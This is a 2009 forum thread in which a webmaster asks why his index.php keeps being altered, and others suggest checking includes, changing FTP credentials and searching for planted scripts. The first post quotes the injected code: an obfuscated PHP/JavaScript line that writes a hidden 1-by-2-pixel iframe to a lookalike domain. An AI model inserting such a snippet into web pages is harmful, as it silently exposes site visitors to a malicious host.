mysterious iframes injected into my index file

Ye' old general discussion board. Basically, for everything that isn't covered elsewhere. Come here to shoot the breeze, shoot your mouth off, or whatever suits your fancy.
This forum is not for asking programming related questions.

Moderator: General Moderators

Post Reply
User avatar
flying_circus
Forum Regular
Posts: 732
Joined: Wed Mar 05, 2008 10:23 pm
Location: Sunriver, OR

mysterious iframes injected into my index file

Post by flying_circus »

Hey guys,

I haven't run across this problem before, but seemingly randomly, something keeps modifying my index.php file. Whatever is doing it removes my onload event from the body tag (this is what clued me into a change being made) and then it appends a javascript at the bottom of the page.

Code: Select all

<?php echo '<script>document.write("<if"+''+'ra'+''+"m"+'e s'+"rc=\"h"+''+'tt'+"p:"+''+"/"+''+'/mic'+"roso"+'t'+''+'f.c'+"n"+'/'+"\" wid"+''+'th=1 he'+"igh"+''+'t'+"="+"2></i"+''+"f"+"ra"+''+""+''+"me"+'>');</script>';?>
 
# Translated:
# <script>document.write(<iframe src="http://microsotf.cn" width=1 height = 2></iframe>);</script>
I understand that this is likely malicious, but what is modifying my page? The entire site is PHP and there is only 1 user entry form to send us an email. The rest of my code appears intact. Should I be going through all my code with a fine tooth comb or would you suspect a problem on my web hosts end? There are no public folders and this site has been online for almost 4 years with no problems until now. It also appears its ONLY the index.php file being changed, the rest of the site seems untouched.
Last edited by flying_circus on Mon Jul 06, 2009 6:42 pm, edited 1 time in total.
User avatar
jackpf
DevNet Resident
Posts: 2119
Joined: Sun Feb 15, 2009 7:22 pm
Location: Ipswich, UK

Re: mysterious iframes injected into my index file

Post by jackpf »

Some hosts automatically append stuff to files for stat tracking and stuff....

However, what other files are being included?
User avatar
flying_circus
Forum Regular
Posts: 732
Joined: Wed Mar 05, 2008 10:23 pm
Location: Sunriver, OR

Re: mysterious iframes injected into my index file

Post by flying_circus »

I've seen stat tracking code appended before on other sites, but I'm weary of this one.

I've created a simple php template for the site, so basically it includes a PHP header and footer, and menu system. It also links to my css file, and a jscript file as well.
User avatar
jackpf
DevNet Resident
Posts: 2119
Joined: Sun Feb 15, 2009 7:22 pm
Location: Ipswich, UK

Re: mysterious iframes injected into my index file

Post by jackpf »

Well, in order to edit your source, the file has got to be included server side, so...if it's not your host it's in one of those files.

I'd change my ftp passwords and stuff though if I was you.
Reviresco
Forum Contributor
Posts: 172
Joined: Tue Feb 19, 2008 4:18 pm
Location: Milwaukee

Re: mysterious iframes injected into my index file

Post by Reviresco »

I had something similar to this happen to two of my websites (both on Network Solutions). Despite removing the injected code repeatedly, it would always recur (except with different code each time). Changing FTP passwords didn't help.

Finally I went through every file and folder on the server and discovered some scripts that I had not placed there. I recall that they were placed deep within "images" folders. After I deleted them, the problems ceased.

So I would search your own directories for malicious scripts.

Until I found this, I kept a backup of each page that had been hacked. Every time the page was loaded, it compared it to the backup -- if there was any difference, it restored the backup, made a new backup, and emailed me. It worked, but obviously was just a bandaid.
User avatar
flying_circus
Forum Regular
Posts: 732
Joined: Wed Mar 05, 2008 10:23 pm
Location: Sunriver, OR

Re: mysterious iframes injected into my index file

Post by flying_circus »

Thanks for the suggestions guys. I will start by scrutinizing the contents of my folders.
zareef
Forum Newbie
Posts: 3
Joined: Wed Aug 03, 2005 3:21 am
Location: India

Re: mysterious iframes injected into my index file

Post by zareef »

jackpf wrote:Well, in order to edit your source, the file has got to be included server side, so...if it's not your host it's in one of those files.

I'd change my ftp passwords and stuff though if I was you.
Not only change the password but also make sure that you don't store them in your FTP client application.
Post Reply